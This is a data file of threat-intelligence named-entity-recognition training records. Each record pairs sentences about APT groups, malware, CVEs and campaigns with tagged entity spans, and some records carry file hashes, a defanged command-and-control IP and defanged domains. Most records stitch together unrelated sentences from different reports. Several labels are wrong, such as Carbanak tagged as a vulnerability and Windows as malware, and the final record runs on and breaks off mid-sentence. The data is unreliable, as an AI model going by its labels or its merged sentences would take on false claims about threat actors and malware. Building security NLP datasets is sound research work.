The CONFUCIUS_B executable is disguised as a PowerPoint presentation , using a Right-To-Left-Override ( RTLO ) trick and a false icon .", "spans": {"ORGANIZATION: Kaspersky": [[0, 9]], "THREAT_ACTOR: BlackOasis’": [[32, 43]], "VULNERABILITY: zero day": [[109, 117]], "FILEPATH: CONFUCIUS_B": [[124, 135]], "TOOL: Right-To-Left-Override": [[199, 221]], "TOOL: RTLO": [[224, 228]]}, "info": {"id": "cyberner_stix_train_001593", "source": "cyberner_stix_train"}} {"text": "In the case of Artifact #1 , the name of the pipe is ahexec , computers over the network could access the pipe server by simply opening a file handle on \\ServerNamepipeahexec .", "spans": {}, "info": {"id": "cyberner_stix_train_001594", "source": "cyberner_stix_train"}} {"text": "Threat actors like Confucius and Patchwork are known for their large arsenal of tools and ever-evolving techniques that can render traditional security solutions — which are often not designed to handle the persistent and sophisticated threats detailed in this blog — ineffective . TG-3390 can quickly leverage compromised network infrastructure during an operation and can conduct simultaneous intrusions into multiple environments .", "spans": {"THREAT_ACTOR: Confucius": [[19, 28]], "THREAT_ACTOR: Patchwork": [[33, 42]], "THREAT_ACTOR: TG-3390": [[282, 289]]}, "info": {"id": "cyberner_stix_train_001595", "source": "cyberner_stix_train"}} {"text": "] website 107 [ . The Elfin group ( aka APT33 ) has remained highly active over the past three years , attacking at least 50 organizations in Saudi Arabia , the United States , and a range of other countries . Persistence modules are based on scheduled tasks and system . 
The request header is included in the binary as follows", "spans": {"THREAT_ACTOR: Elfin group": [[22, 33]], "THREAT_ACTOR: APT33": [[40, 45]]}, "info": {"id": "cyberner_stix_train_001596", "source": "cyberner_stix_train"}} {"text": "The newer variant of KopiLuwak is now capable of exfiltrating files to the C&C as well as downloading files and saving them to the infected machine . The reality is that IT departments of small to large-sized organizations are not equipped to handle the more advanced threats that groups like Confucius use in their attacks .", "spans": {"MALWARE: KopiLuwak": [[21, 30]], "ORGANIZATION: IT departments": [[170, 184]]}, "info": {"id": "cyberner_stix_train_001597", "source": "cyberner_stix_train"}} {"text": "However , in September last year , our friends at CSIS published a blog detailing a new Carbanak variant affecting one of its customers . By using such features and tools , attackers are hoping to blend in on the victim 's network and hide their activity in a sea of legitimate processes .", "spans": {"ORGANIZATION: CSIS": [[50, 54]], "VULNERABILITY: Carbanak": [[88, 96]]}, "info": {"id": "cyberner_stix_train_001598", "source": "cyberner_stix_train"}} {"text": "These malware families have a rich history of being used in many targeted attacks against government and private organizations . Kessem .", "spans": {"MALWARE: malware": [[6, 13]], "ORGANIZATION: government": [[90, 100]], "ORGANIZATION: private": [[105, 112]], "ORGANIZATION: organizations": [[113, 126]], "ORGANIZATION: Kessem": [[129, 135]]}, "info": {"id": "cyberner_stix_train_001599", "source": "cyberner_stix_train"}} {"text": "The malware checks whether its running on a 32-bit or 64-bit system to determine which PowerShell script to grab from the command and control (C2) server . 
DarkPulsar is a very interesting administrative module for controlling a passive backdoor named ' sipauth32.tsp ' that provides remote control , belonging to this category .", "spans": {"TOOL: PowerShell script": [[87, 104]], "MALWARE: DarkPulsar": [[156, 166]], "MALWARE: backdoor": [[237, 245]], "FILEPATH: sipauth32.tsp": [[254, 267]]}, "info": {"id": "cyberner_stix_train_001600", "source": "cyberner_stix_train"}} {"text": "Cybereason Mobile detects EventBot and provides the user with immediate actions . It is possible that CVE-2017-8759 was being used by additional actors . The threat actor has previously been the subject of a range of open source reporting , including most notably a report by FireEye comprehensively detailing the threat actor 's use of the Poison Ivy malware family and blog posts by Trend Micro3 similarly detailing the use of EvilGrab malware .", "spans": {"SYSTEM: Cybereason Mobile": [[0, 17]], "MALWARE: EventBot": [[26, 34]], "VULNERABILITY: CVE-2017-8759": [[102, 115]], "THREAT_ACTOR: actors": [[145, 151]], "ORGANIZATION: FireEye": [[276, 283]], "MALWARE: Poison Ivy malware family": [[341, 366]], "ORGANIZATION: Trend Micro3": [[385, 397]], "MALWARE: EvilGrab": [[429, 437]], "MALWARE: malware": [[438, 445]]}, "info": {"id": "cyberner_stix_train_001601", "source": "cyberner_stix_train"}} {"text": "init . 93ce211a71867017723cd78969aa4cac9d21c3d8f72c96ee3e1b2712c0eea494", "spans": {"FILEPATH: 93ce211a71867017723cd78969aa4cac9d21c3d8f72c96ee3e1b2712c0eea494": [[7, 71]]}, "info": {"id": "cyberner_stix_train_001602", "source": "cyberner_stix_train"}} {"text": "It then starts the final detonator function to load the dropped .dex file into memory and triggers the main payload . APT15 then used a tool known as RemoteExec . This remote access Trojan has the capability that allows an attacker to completely take control of the compromised . 
None Organizations should apply the November 8 , 2022 patches for Exchange to prevent exploitation since the URL rewrite mitigations for ProxyNotShell are not effective against this exploit method .", "spans": {"THREAT_ACTOR: APT15": [[118, 123]], "TOOL: RemoteExec": [[150, 160]], "MALWARE: Trojan": [[182, 188]], "VULNERABILITY: ProxyNotShell": [[417, 430]]}, "info": {"id": "cyberner_stix_train_001603", "source": "cyberner_stix_train"}} {"text": "Once infected , the C&C commands for the infected system launches a loud scanning activity and spreads the botnet by sending a “ whole kit ” of binary files at once with naming conventions same as the ones already in the targeted host , likely banking on breaking through via “ security through obscurity. ” They attempted to evade traffic inspection by encoding the code for the scanner with base-64 .", "spans": {"TOOL: C&C": [[20, 23]]}, "info": {"id": "cyberner_stix_train_001604", "source": "cyberner_stix_train"}} {"text": "Rooting trojan com.android.world.news bd233c1f5c477b0cc15d7f84392dab3a7a598243efa3154304327ff4580ae213 Zen trojan com.lmt.register eb12cd65589cbc6f9d3563576c304273cb6a78072b0c20a155a0951370476d8d Mobile Campaign ‘ Bouncing Golf ’ Affects Middle East We uncovered a cyberespionage campaign targeting Middle WildFire properly classifies BBSRAT malware samples as malicious . The first file is an Extensible Markup Language ( XML ) file that can be opened and viewed in a text editor . 
We have discovered and analysed two previously unknown infector vectors that were used in the MiniDuke attacks .", "spans": {"MALWARE: Zen": [[103, 106]], "MALWARE: Bouncing Golf": [[214, 227]], "ORGANIZATION: WildFire": [[306, 314]], "TOOL: BBSRAT malware samples": [[335, 357]], "TOOL: Extensible Markup Language": [[394, 420]], "TOOL: XML": [[423, 426]], "THREAT_ACTOR: MiniDuke attacks": [[577, 593]]}, "info": {"id": "cyberner_stix_train_001605", "source": "cyberner_stix_train"}} {"text": "During installation , Riltok asks the user for permission to use special features in AccessibilityService by displaying a fake warning : If the user ignores or declines the request , the window keeps opening ad infinitum . FireEye assesses that APT32 is a cyber espionage group aligned with Vietnamese government interests . An interesting fact : the dropped library was compiled in 2014 and appears in our telemetry in August 2015 .", "spans": {"MALWARE: Riltok": [[22, 28]], "ORGANIZATION: FireEye": [[223, 230]], "THREAT_ACTOR: APT32": [[245, 250]], "ORGANIZATION: Vietnamese": [[291, 301]], "ORGANIZATION: government": [[302, 312]]}, "info": {"id": "cyberner_stix_train_001606", "source": "cyberner_stix_train"}} {"text": "The example below steals Facebook data : All the other hardcoded applications targeted by the payload : Package name Name jp.naver.line.android LINE : Free Calls & Messages com.facebook.orca Facebook messenger com.facebook.katana Facebook com.whatsapp WhatsApp com.viber.voip Viber Parser payload Upon receiving a specific command , the implant can download a special payload to grab sensitive information from external applications . With deception and false flags increasingly being employed by threat actors , attribution is a hard and complicated task that requires solid evidence , especially in complex regions such as the Middle East . 
Some reporting suggests a number of other groups , including Axiom , APT17 , and Ke3chang , are closely linked to Winnti Group .", "spans": {"SYSTEM: Facebook": [[25, 33], [230, 238]], "SYSTEM: LINE : Free Calls & Messages": [[144, 172]], "SYSTEM: Facebook messenger": [[191, 209]], "SYSTEM: WhatsApp": [[252, 260]], "SYSTEM: Viber": [[276, 281]], "THREAT_ACTOR: threat actors": [[497, 510]], "THREAT_ACTOR: Axiom": [[704, 709]], "THREAT_ACTOR: APT17": [[712, 717]], "THREAT_ACTOR: Ke3chang": [[724, 732]], "THREAT_ACTOR: Winnti Group": [[757, 769]]}, "info": {"id": "cyberner_stix_train_001607", "source": "cyberner_stix_train"}} {"text": "The app also creates hooks to prevent the phone from rebooting , going to sleep or allowing the user from pressing hardware buttons during the account creation process . These attacks are primarily targeting private industry in search of key intellectual property for competitive advantage , military institutions , and governmental organizations often in search of documents related to current political events and human rights organizations . FireEye has monitored APT17 ’s use of BLACKCOFFEE variants since 2013 to masquerade malicious communication as normal web traffic by disguising the C2 communication as queries to web search engines . 
These malicious PDF files were rigged with exploits attacking Adobe Reader versions 9 , 10 and 11 , bypassing its sandbox .", "spans": {"ORGANIZATION: private industry": [[208, 224]], "ORGANIZATION: military institutions": [[292, 313]], "ORGANIZATION: governmental organizations": [[320, 346]], "ORGANIZATION: political": [[395, 404]], "ORGANIZATION: human rights organizations": [[416, 442]], "ORGANIZATION: FireEye": [[445, 452]], "THREAT_ACTOR: APT17": [[467, 472]], "MALWARE: BLACKCOFFEE": [[483, 494]], "TOOL: C2": [[593, 595]], "MALWARE: malicious PDF files": [[651, 670]], "TOOL: Adobe Reader versions 9 , 10 and 11": [[707, 742]]}, "info": {"id": "cyberner_stix_train_001608", "source": "cyberner_stix_train"}} {"text": "Yet the document cache published April 8 provides evidence that the NSA had once launched a series of successful computer-based intrusions against multiple high-profile foreign targets , including the Office of the President of Iran and the Russian Federal Nuclear Center . We named the actor DustSquad and have provided private intelligence reports to our customers on four of their campaigns involving custom Android and Windows malware .", "spans": {"ORGANIZATION: NSA": [[68, 71]], "THREAT_ACTOR: DustSquad": [[293, 302]], "SYSTEM: Android": [[411, 418]], "MALWARE: Windows": [[423, 430]], "MALWARE: malware": [[431, 438]]}, "info": {"id": "cyberner_stix_train_001609", "source": "cyberner_stix_train"}} {"text": "Confucius' backdoors are delivered through Office documents exploiting memory corruption vulnerabilities CVE-2015-1641 and CVE-2017-11882 . 
ALLANITE conducts malware-less operations primarily leveraging legitimate and available tools in the Windows operating system .", "spans": {"TOOL: Confucius'": [[0, 10]], "VULNERABILITY: CVE-2015-1641": [[105, 118]], "VULNERABILITY: CVE-2017-11882": [[123, 137]], "SYSTEM: Windows": [[241, 248]]}, "info": {"id": "cyberner_stix_train_001610", "source": "cyberner_stix_train"}} {"text": "EventBot loaded library The loaded library dropped on the device . The earliest use of the exploit ITW we were able to identify and confirm is a sample (e228045ef57fb8cc1226b62ada7eee9b) dating back to October 2018 (VirusTotal submission of 2018-10-29) with the RTF creation time 2018-10-23 . APT35 typically targets military , diplomatic and government , media , energy , engineering , business services and telecommunications sectors in U.S. and the Middle East .", "spans": {"MALWARE: EventBot": [[0, 8]], "MALWARE: ITW": [[99, 102]], "MALWARE: RTF": [[262, 265]], "THREAT_ACTOR: APT35": [[293, 298]], "ORGANIZATION: military": [[317, 325]], "ORGANIZATION: diplomatic": [[328, 338]], "ORGANIZATION: government": [[343, 353]], "ORGANIZATION: media": [[356, 361]], "ORGANIZATION: energy": [[364, 370]], "ORGANIZATION: engineering": [[373, 384]], "ORGANIZATION: business services": [[387, 404]], "ORGANIZATION: telecommunications sectors": [[409, 435]]}, "info": {"id": "cyberner_stix_train_001611", "source": "cyberner_stix_train"}} {"text": "Zen requires root to work correctly on the Android operating system . The goal of the attackers appears to be to collect intellectual property such as design documents , formulas , and manufacturing processes . These clusters of activity raise interesting questions about the use of an identical silently-patched vulnerability , possibly by multiple threat groups . 
Methods of manipulating control can include changes to set point values , tags , or other parameters .", "spans": {"MALWARE: Zen": [[0, 3]], "SYSTEM: Android": [[43, 50]]}, "info": {"id": "cyberner_stix_train_001612", "source": "cyberner_stix_train"}} {"text": "This allows the malicious activity to evade detection .", "spans": {}, "info": {"id": "cyberner_stix_train_001613", "source": "cyberner_stix_train"}} {"text": "Conclusion As our computing increasingly crosses multiple screens , we should expect to see threats extending across mobile and desktop environments . The attacker is provided with a USB containing malware developed for the CIA for this purpose , which is inserted into the targeted computer . Some analysts track Deep Panda and APT19 as the same group , but it is unclear from open source information if the groups are the same .", "spans": {"THREAT_ACTOR: attacker": [[155, 163]], "TOOL: USB containing malware": [[183, 205]], "THREAT_ACTOR: track Deep Panda": [[308, 324]], "THREAT_ACTOR: APT19": [[329, 334]]}, "info": {"id": "cyberner_stix_train_001614", "source": "cyberner_stix_train"}} {"text": "Around 2011 , the infamous Zeus Trojan started using web injects that tricked users into downloading a mobile component called “ ZitMo ” ( Zeus in the Mobile ) . The attackers involved in these email campaigns leveraged a variety of distribution mechanisms to deliver the information stealing FormBook malware . 
The group conducts operations primarily in the Middle East , targeting financial , government , energy , chemical , telecommunications and other industries .", "spans": {"MALWARE: Zeus Trojan": [[27, 38]], "MALWARE: ZitMo": [[129, 134]], "MALWARE: Zeus": [[139, 143]], "THREAT_ACTOR: attackers": [[166, 175]], "ORGANIZATION: financial": [[383, 392]], "ORGANIZATION: government": [[395, 405]], "ORGANIZATION: energy": [[408, 414]], "ORGANIZATION: chemical": [[417, 425]], "ORGANIZATION: telecommunications": [[428, 446]]}, "info": {"id": "cyberner_stix_train_001615", "source": "cyberner_stix_train"}} {"text": "Additionally , as previously mentioned , the decoy document subject matter would likely be of interest to a few different potential targets in the Palestinian Territories .", "spans": {}, "info": {"id": "cyberner_stix_train_001616", "source": "cyberner_stix_train"}} {"text": "But even though they share the use of Winnti , the BARIUM and LEAD activity groups are involved in very different intrusion scenarios .", "spans": {"MALWARE: Winnti": [[38, 44]], "THREAT_ACTOR: BARIUM": [[51, 57]], "THREAT_ACTOR: LEAD": [[62, 66]]}, "info": {"id": "cyberner_stix_train_001617", "source": "cyberner_stix_train"}} {"text": "Taking a step back , as discussed in the Appendix in our initial OilRig blog , Clayslide delivery documents initially open with a worksheet named \" Incompatible \" that displays content that instructs the user to \" Enable Content \" to see the contents of the document , which in fact runs the malicious macro and compromises the system . 
So far , Unit 42 has seen infrastructure overlaps with servers hosting C2 servers for samples of the FFRAT , PlugX , Poison Ivy and Scieron Trojans , suggesting that the threat actors use these tools as the payload in their attacks .", "spans": {"THREAT_ACTOR: OilRig": [[65, 71]], "MALWARE: Clayslide delivery documents": [[79, 107]], "ORGANIZATION: Unit 42": [[346, 353]], "TOOL: C2": [[408, 410]], "MALWARE: FFRAT": [[438, 443]], "MALWARE: PlugX": [[446, 451]], "MALWARE: Poison Ivy": [[454, 464]], "MALWARE: Scieron Trojans": [[469, 484]]}, "info": {"id": "cyberner_stix_train_001618", "source": "cyberner_stix_train"}} {"text": "In keeping with its shift to more overt tactics , the group appeared to publicly take credit for the attack , leaking the information on a website using the name “ Fancy Bears ” , an industry codename that was already widely used for the group .", "spans": {"THREAT_ACTOR: Fancy Bears": [[164, 175]]}, "info": {"id": "cyberner_stix_train_001619", "source": "cyberner_stix_train"}} {"text": "Cobalt Strike payload : 7101fff478290d4db8a1c11a8d3b40cb , 4c81777551a772218519fb6dd1a6672aade4a936 , bdf1452b55b9974f3e9a4aea4439769a02fd931660ed655df92519a2a4df1261 .", "spans": {"TOOL: Cobalt Strike": [[0, 13]], "FILEPATH: 7101fff478290d4db8a1c11a8d3b40cb": [[24, 56]], "FILEPATH: 4c81777551a772218519fb6dd1a6672aade4a936": [[59, 99]], "FILEPATH: bdf1452b55b9974f3e9a4aea4439769a02fd931660ed655df92519a2a4df1261": [[102, 166]]}, "info": {"id": "cyberner_stix_train_001620", "source": "cyberner_stix_train"}} {"text": "We discovered 561MB of exfiltrated data from 24 compromised Android devices while investigating this threat . Recreating and maintaining fake bank sites can be an arduous task , but Kessem claims the GozNym group appears up to the task . Based on the 400+ samples of WEBC2 variants that we have accumulated , it appears that APT1 has direct access to developers who have continually released new WEBC2 variants for over six years . 
But a potential of attackers to misuse such access to infect hundreds of millions of Internet users creates a great risk . \"", "spans": {"SYSTEM: Android": [[60, 67]], "ORGANIZATION: bank": [[142, 146]], "ORGANIZATION: Kessem": [[182, 188]], "MALWARE: WEBC2": [[267, 272], [396, 401]], "THREAT_ACTOR: APT1": [[325, 329]], "THREAT_ACTOR: attackers": [[451, 460]]}, "info": {"id": "cyberner_stix_train_001621", "source": "cyberner_stix_train"}} {"text": "In another instance , the DDE attack was used to deliver an open-source penetration testing toolkit called Koadic .", "spans": {"TOOL: Koadic": [[107, 113]]}, "info": {"id": "cyberner_stix_train_001622", "source": "cyberner_stix_train"}} {"text": "It seems , “ Agent Smith ” prey list does not only have popular yet Janus vulnerable apps to ensure high proliferation , but also contain competitor apps of actor ’ s legitimate business arm to suppress competition . Group-IB specialists detected various sites used by criminals to spread the Trojan : mail tracking websites , news portals , electronic books , computer graphics resources , music portals , etc . They register typo-squatting domains , impersonating legitimate companies . Several Democratic lawmakers released a report last week that accused TaxAct , H&R Block and TaxSlayer of embedding Meta and Google ’s tracking pixels on their sites , potentially violating U.S. 
law and sharing taxpayers ’ information with those companies .", "spans": {"MALWARE: Agent Smith": [[13, 24]], "VULNERABILITY: Janus": [[68, 73]], "ORGANIZATION: Group-IB": [[217, 225]], "TOOL: mail tracking websites": [[302, 324]], "TOOL: news portals": [[327, 339]], "TOOL: electronic books": [[342, 358]], "TOOL: computer graphics resources": [[361, 388]], "TOOL: music portals": [[391, 404]], "ORGANIZATION: Democratic lawmakers": [[497, 517]], "ORGANIZATION: TaxAct": [[559, 565]], "ORGANIZATION: H&R Block": [[568, 577]], "SYSTEM: TaxSlayer": [[582, 591]], "ORGANIZATION: Meta": [[605, 609]], "ORGANIZATION: Google ’s tracking pixels": [[614, 639]], "SYSTEM: sites": [[649, 654]]}, "info": {"id": "cyberner_stix_train_001623", "source": "cyberner_stix_train"}} {"text": "] net www [ . The Arbor report describes the ongoing use of these four vulnerabilities in a series of espionage campaigns against not only Tibetan groups , but also others related to Hong Kong , Taiwan , and Uyghur interests . Attackers do not change their approach unless an external force or environmental shift compels them to . Following a successful infection , callbacks are made to the RAT 's command and control server at 94.158.247[.]27 .", "spans": {"ORGANIZATION: Arbor": [[18, 23]], "ORGANIZATION: Tibetan groups": [[139, 153]], "SYSTEM: control server": [[412, 426]]}, "info": {"id": "cyberner_stix_train_001624", "source": "cyberner_stix_train"}} {"text": "Resistance to anti-malware protection The ability of malicious software to operate continuously on the victim ’ s mobile device is an important aspect of its development . the targets of the hacking group were in the automotive . It replaces the original instructions at 0x10BA with an unconditional jump ( jmp – 0xE9 ) to the address of the function from hpqhvsei.dll that decrypts and executes the encrypted payload embedded in the launcher . 
In 2015 GReAT reported that CozyDuke often spear phishes targets with emails containing a link to a hacked website .", "spans": {"ORGANIZATION: automotive": [[217, 227]], "FILEPATH: hpqhvsei.dll": [[356, 368]], "ORGANIZATION: GReAT": [[453, 458]], "MALWARE: CozyDuke": [[473, 481]]}, "info": {"id": "cyberner_stix_train_001625", "source": "cyberner_stix_train"}} {"text": "Conclusions Cybereason Mobile Detects and Stops FakeSpy Indicators of Compromise INTRODUCTION For the past several weeks , Cybereason has been investigating a new version of Android malware dubbed FakeSpy , which was first identified in October 2017 and reported again in October 2018 . \bCharacterized by relatively unsophisticated technical merit and extensive use of spear phishing , the Magic Hound targeted individuals and organizations in the Middle East (including targets inside Iran itself) , as well as across Europe and in the United States . Previously , LookingGlass reported on a campaign they named \" Operation Armageddon \" , targeting individuals involved in the Ukrainian military and national security establishment .", "spans": {"ORGANIZATION: Cybereason Mobile": [[12, 29]], "MALWARE: FakeSpy": [[48, 55], [197, 204]], "ORGANIZATION: Cybereason": [[123, 133]], "SYSTEM: Android": [[174, 181]], "THREAT_ACTOR: Magic Hound": [[390, 401]], "ORGANIZATION: LookingGlass": [[566, 578]], "ORGANIZATION: military": [[688, 696]]}, "info": {"id": "cyberner_stix_train_001626", "source": "cyberner_stix_train"}} {"text": "To provide a sense of the limited functionality within the webshell itself , the bitreeview.aspx AntSword webshell deployed in this attack ( SHA256: 15ecb6ac6c637b58b2114e6b21b5b18b0c9f5341ee74b428b70e17e64b7da55e ) was only 162 bytes .", "spans": {"FILEPATH: bitreeview.aspx": [[81, 96]], "TOOL: AntSword": [[97, 105]], "FILEPATH: 15ecb6ac6c637b58b2114e6b21b5b18b0c9f5341ee74b428b70e17e64b7da55e": [[149, 213]]}, "info": {"id": "cyberner_stix_train_001627", "source": "cyberner_stix_train"}} 
{"text": "Depending if the victim has any of the targeted applications , the anti-virus installed or geographic location , the malware can harvest credentials from the targeted applications , exfiltrate all personal information or simply use the victim 's device to send SMS to spread the trojan The malware deploys overlaying webviews to trick the user and eventually steal their login credentials . MuddyWater is a relatively new APT that surfaced in 2017 . The malware behavior and code share similarities with an older KHRAT sample from May 2018 . Otherwise , your data will be sold to DarkNetDarkWeb .", "spans": {"THREAT_ACTOR: MuddyWater": [[391, 401]], "THREAT_ACTOR: APT": [[422, 425]], "MALWARE: KHRAT": [[513, 518]], "TOOL: DarkNetDarkWeb": [[580, 594]]}, "info": {"id": "cyberner_stix_train_001628", "source": "cyberner_stix_train"}} {"text": "Microsoft labels activity groups using code names derived from elements in the periodic table .", "spans": {"ORGANIZATION: Microsoft": [[0, 9]]}, "info": {"id": "cyberner_stix_train_001629", "source": "cyberner_stix_train"}} {"text": "The current attack took advantage of the compromise of a high-profile Tibetan activist . The sctrls backdoor we came across is delivered via RTF files exploiting CVE-2015-1641 . While Night Dragon attacks focused specifically on the energy sector , the tools and techniques of this kind can be highly successful when targeting any industry .", "spans": {"TOOL: sctrls backdoor": [[93, 108]], "VULNERABILITY: CVE-2015-1641": [[162, 175]], "ORGANIZATION: energy sector": [[233, 246]]}, "info": {"id": "cyberner_stix_train_001630", "source": "cyberner_stix_train"}} {"text": "This ransomware family ’ s long history tells us that its evolution is far from over . The Ke3chang attackers have been active since at least 2010 . in order to break the techniques we have to understand both of the obfuscation mechanisms and disassembler tool internals before we can automate the process . 
This includes hosting C&C domains that were used by Winnti such as mtrue.com , shenqi[.]kr and zhu[.]kr .", "spans": {"THREAT_ACTOR: Ke3chang": [[91, 99]], "THREAT_ACTOR: attackers": [[100, 109]]}, "info": {"id": "cyberner_stix_train_001631", "source": "cyberner_stix_train"}} {"text": "Moreover , as we use mobile devices to access the web and phishing templates extend to mobile environments , we should expect to see a greater variety of integrated threats like the scheme we detail here . The attacker then infects and exfiltrates data to removable media . Dragonfly : Energetic Bear .", "spans": {"THREAT_ACTOR: attacker": [[210, 218]], "ORGANIZATION: media": [[266, 271]], "THREAT_ACTOR: Dragonfly": [[274, 283]], "THREAT_ACTOR: Energetic Bear": [[286, 300]]}, "info": {"id": "cyberner_stix_train_001632", "source": "cyberner_stix_train"}} {"text": "The overall image of these ties is below in Figure 5 and paints a picture of an adversary with at least 5 malware families in their toolbox dating back to at least 2015 . The group will also use a compromised account to create scheduled tasks on systems or modify legitimate Windows services to install the HIGHNOON and SOGU backdoors . As we now know , by February 2013 the Dukes group had been operating MiniDuke and other toolsets for at least 4 and a half years .", "spans": {"THREAT_ACTOR: group": [[175, 180]], "TOOL: HIGHNOON": [[307, 315]], "TOOL: SOGU": [[320, 324]], "THREAT_ACTOR: Dukes group": [[375, 386]], "MALWARE: MiniDuke": [[406, 414]]}, "info": {"id": "cyberner_stix_train_001633", "source": "cyberner_stix_train"}} {"text": "Stage 2 : Exodus Two The Zip archive returned by the check-in performed by Exodus One is a collection of files including the primary payload mike.jar and several compiled utilities that serve different functions . The attackers sent multiple emails containing macro-enabled XLS files to employees working in the banking sector in the Middle East . 
For example , the VM or the sandbox must have the keyboard layout of the targeted countries and a disk serial number . While the Kritec skimmer hangs around the Google Tag Manager script , we believe it is not related to the other active campaigns .", "spans": {"MALWARE: Exodus Two": [[10, 20]], "MALWARE: Exodus One": [[75, 85]], "THREAT_ACTOR: attackers": [[218, 227]], "MALWARE: XLS files": [[274, 283]], "ORGANIZATION: employees working in the banking sector": [[287, 326]], "TOOL: VM": [[366, 368]], "TOOL: sandbox": [[376, 383]], "MALWARE: Kritec skimmer": [[477, 491]], "MALWARE: Google Tag Manager script": [[509, 534]]}, "info": {"id": "cyberner_stix_train_001634", "source": "cyberner_stix_train"}} {"text": "Both the client and server uses the same API , but the client serializer cannot serialize server objects , because they are not the same as their “ mirrored ” objects inside the client .", "spans": {}, "info": {"id": "cyberner_stix_train_001635", "source": "cyberner_stix_train"}} {"text": "PittyTiger leverages social engineering to deliver spearphishing emails , in a variety of languages including English , French and Chinese , and email phishing pages to their targets . After successfully infecting one of the computers and gaining initial access to the system , the attackers perform reconnaissance of the local network in order to gain domain administrator privileges and eventually consolidate control over the network .", "spans": {"THREAT_ACTOR: PittyTiger": [[0, 10]], "ORGANIZATION: social engineering": [[21, 39]]}, "info": {"id": "cyberner_stix_train_001636", "source": "cyberner_stix_train"}} {"text": "Join us in a live webinar as we discuss this threat group whom we assess to be working on behalf of the Iranian Government , with a mission that would benefit nation-state geopolitical and economic needs . 
There is a file shortcut embedded in the malicious .docx file—one that will download an executable file from Dropbox that executes once clicked by the user .", "spans": {"THREAT_ACTOR: threat group": [[45, 57]], "ORGANIZATION: Iranian Government": [[104, 122]], "ORGANIZATION: nation-state geopolitical": [[159, 184]], "ORGANIZATION: economic": [[189, 197]], "FILEPATH: .docx": [[257, 262]], "TOOL: Dropbox": [[315, 322]]}, "info": {"id": "cyberner_stix_train_001637", "source": "cyberner_stix_train"}} {"text": "Volexity has also found that , in addition to sending malware lures , the Patchwork threat actors are leveraging unique tracking links in their e-mails for the purpose of identifying which recipients opened their e-mail messages . Chafer , uses Backdoor.Remexi .", "spans": {"ORGANIZATION: Volexity": [[0, 8]], "THREAT_ACTOR: Patchwork threat actors": [[74, 97]], "MALWARE: Backdoor.Remexi": [[245, 260]]}, "info": {"id": "cyberner_stix_train_001638", "source": "cyberner_stix_train"}} {"text": "SpyNote RAT is capable of performing a variety of alarming functions that includes : Activating the device ’ s microphone and listening to live conversations Executing commands on the device Copying files from the device to a Command & Control ( C & C ) center Recording screen captures Viewing contacts Reading SMS messages The screenshot below shows part of the sandbox ’ s report on the SpyNote RAT ’ s signature and detected functions : The fake Netflix app we are analyzing in this blog appears to be built using an updated version of SpyNote RAT builder , Prior to April 2018 , as described in Group-IB’s Silence: Moving into the darkside report , Silence’s target interests were primarily limited to former Soviet and Eastern European countries including Russia , Ukraine , Belarus , Azerbaijan , Poland , and Kazakhstan . 
The first successful bank robbery was committed by this group in January 2013 .", "spans": {"MALWARE: SpyNote RAT": [[0, 11], [390, 401], [540, 551]], "ORGANIZATION: Netflix": [[450, 457]], "THREAT_ACTOR: Group-IB’s": [[600, 610]]}, "info": {"id": "cyberner_stix_train_001639", "source": "cyberner_stix_train"}} {"text": "In this case , a threat actor has been targeting customers of Bank Austria , Raiffeisen Meine Bank , and Sparkasse since at least January 2017 . This new Lotus Blossom campaign delivers a malicious RTF document posing as an ASEAN Defence Minister's Meeting (ADMM) directory (decoy) that also carries an executable (payload) embedded as an OLE object , the Elise backdoor . Elderwood : Elderwood Gang , Beijing Group , Sneaky Panda .", "spans": {"THREAT_ACTOR: Lotus Blossom": [[154, 167]], "THREAT_ACTOR: Elderwood": [[373, 382]], "THREAT_ACTOR: Elderwood Gang": [[385, 399]], "THREAT_ACTOR: Beijing Group": [[402, 415]], "THREAT_ACTOR: Sneaky Panda": [[418, 430]]}, "info": {"id": "cyberner_stix_train_001640", "source": "cyberner_stix_train"}} {"text": "Some hackers even went onto use the Cisco exploits in the wild . Once the Barium Defendants have access to a victim computer through the malware described above , they monitor the victim 's activity and ultimately search for and steal sensitive documents ( for example , Exfiltration of intellectual property regarding technology has been seen ) , and personal information fi\"om the victim 's network .", "spans": {"VULNERABILITY: Cisco exploits": [[36, 50]], "THREAT_ACTOR: Barium": [[74, 80]], "ORGANIZATION: technology": [[319, 329]]}, "info": {"id": "cyberner_stix_train_001641", "source": "cyberner_stix_train"}} {"text": "Moreover , Wh1sks was able to find out the email addresses of five people who have subscribed to the Shadow Brokers' monthly dump service . The installed EXE file is almost exactly the same as the DLL version of Bisonal variant used against the Russian organization . 
The targets are military or defense industry in particular countries , it used DDNS for C2 servers , and tracked connections from their victims by using target or campaign codes , as well as disguising the malware as document file , and using a dropper to install the malware and decoy file . A previous campaign of this APT group was uncovered by Talos in June 2017 , and since then very little of this operation was seen in the wild . ined in the archive is called DriverInstallerU.exe” but its metadata shows that its original name is Interenet Assistant.exe” . After reviewing all the malware functionalities , we are confident in saying that the attackers look for victims who answer well-defined characteristics and believe that further stages of the attack are delivered only to those who fit the specific victim profile . In this sample , however , the module names were changed from actors and characters’ names to car models , namely BMW_x1” , BMW_x2” and up to BMW_x8” . But , thanks to the attackers known affection for decoy documents that pose as news summaries , we were able to date the campaign back to March 2018 . With the experience gained from the APT attack that began in March 2017 , it seems this campaign has evolved into an attack with new capabilities , and an even more specific target , over a year later . These unknown actors continued launching DDoS attacks over the next few years . For simplicity , Kaspersky is calling them the BlackEnergy APT group . Since the middle of 2015 , one of the preferred attack vectors for BlackEnergy in Ukraine has been Excel documents with macros that drop the Trojan to disk if the user chooses to run the script in the document . A very good analysis and overview of the BlackEnergy attacks in Ukraine throughout 2014 and 2015 was published by the Ukrainian security firm Cys Centrum the text is only available in Russian for now , but can be read via Google Translate . 
The earliest signs of destructive payloads with BlackEnergy go back as far as June 2014 . BlackEnergy is a highly dynamic threat actor and the current attacks in Ukraine indicate that destructive actions are on their main agenda , in addition to compromising industrial control installations and espionage activities . Kaspersky will continue to monitor the BlackEnergy attacks in Ukraine and update our readers with more data when available . From Buhtrap perpetrating cybercrime for financial gain , its toolset has been expanded with malware used to conduct espionage in Eastern Europe and Central Asia . Throughout our tracking , we've seen this group deploy its main backdoor as well as other tools against various victims , but June 2019 was the first time we saw the Buhtrap group use a zero-day exploit as part of a campaign . In that case , we observed Buhtrap using a local privilege escalation exploit , CVE-2019-1132 , against one of its victims . However , as the shift in targets occurred before the source code leak , we assess with high confidence that the same people behind the first Buhtrap malware attacks against businesses and banks are also involved in targeting governmental institutions . When Buhtrap was targeting businesses , the decoy documents would typically be contracts or invoices . The Buhtrap group is well known for its targeting of financial institutions and businesses in Russia . Figure 2 is a typical example of a generic invoice the group used in a 